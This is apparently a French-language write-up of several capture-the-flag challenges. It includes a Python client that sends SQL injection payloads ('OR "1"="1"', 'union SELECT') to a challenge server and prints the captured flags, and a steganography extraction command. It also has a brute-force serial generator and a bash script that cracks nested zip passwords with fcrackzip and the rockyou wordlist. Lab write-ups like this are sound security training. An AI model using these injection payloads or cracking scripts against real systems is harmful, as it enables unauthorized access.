Table des matières

Challenges Misc 1 et 2

root@kali:~/Downloads# python client.py [+] Test level1 … Welcome on level 1 !

Welcome b'admin” OR “1”=“1', the flag is 'ESE{n0T_S0_H4rd_R1gHt_!?}'

[+] Test level2 … Welcome on level 2 !

Citation #123 union SELECT * fROM flag: ESE{7d2f9e9beab248febaf5bddffc3a39a4}

Code source : client.py

client.py
#encoding: utf-8
 
import socket
import sys
 
# change this if needed
HOST = '192.168.1.19'
# change this if needed
IP   = 8096
 
 
def create_socket():
        try:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.settimeout(1)
                s.connect((HOST,IP))
        except Exception as e:
                print("Can't open socket !")
                print(e)
                sys.exit(1)
        return s
 
 
def test_level1():
        print("[+] Test level1 ...")
        s = create_socket()
 
        login = 'admin" OR "1"="1'
        password = 'toto" OR "1"="1"  LIMIT "1" OFFSET "2' 
        cmd = "\x01%s\x00%s" % (login,password)
        s.send(cmd.encode('utf-8'))
        msg = s.recv(1024)
 
 
 
        if msg and msg.decode('utf-8').startswith("Welcome"):
                print(msg.decode('utf-8'))
                res = s.recv(1024)
                print(res.decode('utf-8'))
        else:
                print("If you called a valid level, notice an admin")
        s.close()
 
def test_level2():
        print("[+] Test level2 ...")
        s = create_socket()
 
        citation = '123 union SELECT * fROM flag'
        s.send(b"\x02%s" % (citation))
        msg = s.recv(1024)
        if msg and msg.decode('utf-8').startswith("Welcome"):
                print(msg.decode('utf-8'))
                res = s.recv(1024)
                print(res.decode('utf-8'))
        else:
                print("If you called a valid level, notice an admin")
        s.close()
 
 
 
if __name__ == '__main__':
        test_level1()
        print("")
        test_level2()

challenge de stegano

Il fallait trouver un fichier caché dans l'image ci dessous. Juste rentrer cette commande :p et on a le flag : binwalk –dd='.*' special-k.png

serial

trouver des serials qui respectent le code py suivant

serial.py
import random, string
 
def are_same(serial):
	if (serial[0] != serial[1] and
		serial[1] != serial[2] and
		serial[0] != serial[2]):
		return False
	return True
 
def check_serial(serial):
	try:
		serials = serial.split('-')
	except:
		return False
	if len(serials) != 3:
		return False
	try:
 
		X = [ord(a) for a in list(serials[0])]
		Y = [ord(a) for a in list(serials[1])]
		Z = int(serials[2])
	except ValueError:
		return False
	except:
		return False
 
	if not len(X) == 3 or not len(Y) == 3:
		return False
 
	for a in X+Y:
		#print(a)
		# => MAJ
		if a < 65 or a > 90:
			return False
 
 
	if are_same(X) or are_same(Y):
		return False
 
	if X[1] + 10 > X[2]:
		return False
 
	if Y[1] - 10 < Y[2]:
		return False
	sum1 = X[0] + X[1] + X[2]
	sum2 = Y[0] + Y[1] + Y[2]
	if sum1 == sum2:
		return False
	if sum1+sum2 != Z:
		return False
	if Z % 3 != 0:
		return False
	return True

au lieu de chercher à la main des valeurs j'ai bruteforcer avec ce code

while 1:
	x=''.join(random.choice(string.ascii_uppercase) for _ in range(3))
	y=''.join(random.choice(string.ascii_uppercase) for _ in range(3))
	z=''.join(random.choice(string.digits) for _ in range(3))
 
	s="%s-%s-%s"%(x,y,z)
	print s
	if check_serial(s):
		print s
		break
		exit()

exemple de flag DGR-GVH-450

deeper

une archive zip qui a un zip qui a un zip …. avec des pass :/

code bash pour automatiser la tâche

run.sh
#!/bin/bash
 
# $1 le nom du zip passé en arg
file=$1
test=true
count=1
 
while $test; do
	echo "test $count : $file"
	file $file | grep 'Zip'
	if [ "$?" -eq "0" ]; then
		echo "ZIP ok"
		r=$(fcrackzip -D -u -p /usr/share/wordlists/rockyou.txt $file)
		pass=$(echo $r | awk -F"== " '{print $2}')
		echo "pass is : $pass"
		file=$(unzip -P "$pass" $file | grep -E 'extracting|inflating' | awk -F": " '{print $2}')
		echo "new file [$file]"
		count=$(($count+1))
	else
 
		test=false
	fi
done

output

root@kali:~/deeper# ./run.sh 8KLifFpoUdbxXB5noGIG.zip.start 
test 1 : 8KLifFpoUdbxXB5noGIG.zip.start
8KLifFpoUdbxXB5noGIG.zip.start: Zip archive data, at least v2.0 to extract
ZIP ok
pass is : AC020307
new file [6TF2INzK1as0vC4hmGVW.zip  ]
test 2 : 6TF2INzK1as0vC4hmGVW.zip  
6TF2INzK1as0vC4hmGVW.zip: Zip archive data, at least v2.0 to extract
ZIP ok
pass is : tiagia4
new file [BYJrsoCOfTlWehfvNoBU.zip  ]
test 3 : BYJrsoCOfTlWehfvNoBU.zip  
BYJrsoCOfTlWehfvNoBU.zip: Zip archive data, at least v2.0 to extract
ZIP ok
pass is : jesipato
new file [uBKIeGWEztQN7FwsSr6b.zip  ]
test 4 : uBKIeGWEztQN7FwsSr6b.zip  
uBKIeGWEztQN7FwsSr6b.zip: Zip archive data, at least v2.0 to extract
ZIP ok
pass is : benk2007benk
new file [exhNdH5BI2Hr0lV99EEs.zip  ]
test 5 : exhNdH5BI2Hr0lV99EEs.zip  
exhNdH5BI2Hr0lV99EEs.zip: Zip archive data, at least v2.0 to extract
ZIP ok
pass is : 02456035
...